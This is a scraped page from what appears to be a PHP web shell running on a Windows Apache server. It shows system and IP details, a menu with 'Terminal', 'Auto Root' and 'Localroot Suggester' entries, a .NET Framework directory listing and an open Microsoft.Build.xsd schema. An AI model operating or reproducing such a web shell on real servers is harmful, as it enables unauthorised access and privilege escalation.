Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.52
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
Windows /
Microsoft.NET /
Framework64 /
v3.5 /
Delete
Unzip
Name
Size
Permission
Date
Action
1033
[ DIR ]
drwxrwxrwx
2024-07-12 08:12
1046
[ DIR ]
drwxrwxrwx
2023-01-18 02:30
MSBuild
[ DIR ]
drwxrwxrwx
2023-01-18 02:30
SQL
[ DIR ]
drwxrwxrwx
2023-01-18 02:30
pt-BR
[ DIR ]
drwxrwxrwx
2023-01-18 02:30
AddInProcess.exe
40.88
KB
-rwxrwxrwx
2019-11-08 18:44
AddInProcess.exe.config
158
B
-rw-rw-rw-
2019-10-15 18:51
AddInProcess32.exe
40.88
KB
-rwxrwxrwx
2019-11-08 18:44
AddInProcess32.exe.config
158
B
-rw-rw-rw-
2019-10-15 18:51
AddInUtil.exe
41.08
KB
-rwxrwxrwx
2019-11-08 18:44
AddInUtil.exe.config
158
B
-rw-rw-rw-
2019-10-15 18:51
DataSvcUtil.exe
72.88
KB
-rwxrwxrwx
2019-11-08 18:44
DataSvcUtil.exe.config
156
B
-rw-rw-rw-
2023-01-18 02:29
EdmGen.exe
92.87
KB
-rwxrwxrwx
2019-11-08 18:44
EdmGen.exe.config
156
B
-rw-rw-rw-
2023-01-18 02:29
MSBuild.exe
84.87
KB
-rwxrwxrwx
2019-11-08 18:44
MSBuild.rsp
732
B
-rw-rw-rw-
2019-10-15 18:50
Microsoft.Build.Tasks.v3.5.dll
712
KB
-rw-rw-rw-
2019-11-08 18:44
Microsoft.Build.xsd
2.3
KB
-rw-rw-rw-
2019-10-15 18:51
Microsoft.CSharp.targets
8.72
KB
-rw-rw-rw-
2019-10-15 18:51
Microsoft.Common.Tasks
11.32
KB
-rw-rw-rw-
2019-10-15 18:51
Microsoft.Common.targets
195.98
KB
-rw-rw-rw-
2019-10-15 18:51
Microsoft.Data.Entity.Build.Tasks.dll
40
KB
-rw-rw-rw-
2019-11-08 18:44
Microsoft.Data.Entity.targets
1.73
KB
-rw-rw-rw-
2023-01-18 02:29
Microsoft.VisualBasic.targets
9.38
KB
-rw-rw-rw-
2019-10-15 18:51
Microsoft.VisualC.STLCLR.dll
42
KB
-rw-rw-rw-
2019-11-08 18:44
Microsoft.WinFx.targets
41.78
KB
-rw-rw-rw-
2019-10-15 18:51
Sentinel.v3.5Client.dll
5.5
KB
-rw-rw-rw-
2019-11-08 18:44
WFServicesReg.exe
283.59
KB
-rwxrwxrwx
2019-11-08 18:44
csc.exe
2.18
MB
-rwxrwxrwx
2019-11-08 18:44
csc.exe.config
221
B
-rw-rw-rw-
2019-10-15 18:50
csc.rsp
1.29
KB
-rw-rw-rw-
2019-10-15 18:51
default.win32manifest
490
B
-rw-rw-rw-
2019-10-15 18:45
msbuild.exe.config
1.54
KB
-rw-rw-rw-
2019-10-15 18:51
vbc.exe
2.26
MB
-rwxrwxrwx
2024-06-01 12:19
vbc.exe.config
221
B
-rw-rw-rw-
2019-10-15 18:50
vbc.rsp
1.45
KB
-rw-rw-rw-
2019-10-15 18:51
Save
Rename
<?xml version="1.0" encoding="utf-8"?> <xs:schema targetNamespace="http://schemas.microsoft.com/developer/msbuild/2003" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msb="http://schemas.microsoft.com/developer/msbuild/2003" elementFormDefault="qualified"> <!-- =================== IMPORT COMMON SCHEMA =========================== --> <xs:include schemaLocation="MSBuild\Microsoft.Build.CommonTypes.xsd"/> <!-- ========= ADD CUSTOM ITEMS, PROPERTIES, AND TASKS BELOW ======= --> <!-- Note that these will be in the msbuild namespace. A future version of msbuild may require that custom itemtypes, properties, and tasks be in a custom namespace, but currently msbuild only supports the msbuild namespace. --> <!-- example custom itemtype with particular meta-data required--> <!--<xs:element name="MyItem" substitutionGroup="msb:Item"> <xs:complexType> <xs:complexContent> <xs:extension base="msb:SimpleItemType"> <xs:sequence maxOccurs="1"> <xs:choice> <xs:element name="MyMetaData" type="xs:string"/> </xs:choice> </xs:sequence> </xs:extension> </xs:complexContent> </xs:complexType> </xs:element>--> <!-- Example custom itemtype with NO meta-data --> <!--<xs:element name="MySimpleItem" type="msb:SimpleItemType" substitutionGroup="msb:Item"/>--> <!-- Example custom itemtype with ANY meta-data --> <!--<xs:element name="MyFlexibleItem" type="msb:GenericItemType" substitutionGroup="msb:Item"/>--> <!-- example custom property that allows string content only--> <!--<xs:element name="MySimpleProperty" type="msb:StringPropertyType" substitutionGroup="msb:Property"/>--> <!-- example custom task with single required parameter--> <!--<xs:element name="MyTask" substitutionGroup="msb:Task"> <xs:complexType> <xs:complexContent> <xs:extension base="msb:TaskType"> <xs:attribute name="MyParameter" type="xs:boolean" use="required"/> </xs:extension> </xs:complexContent> </xs:complexType> </xs:element>--> </xs:schema>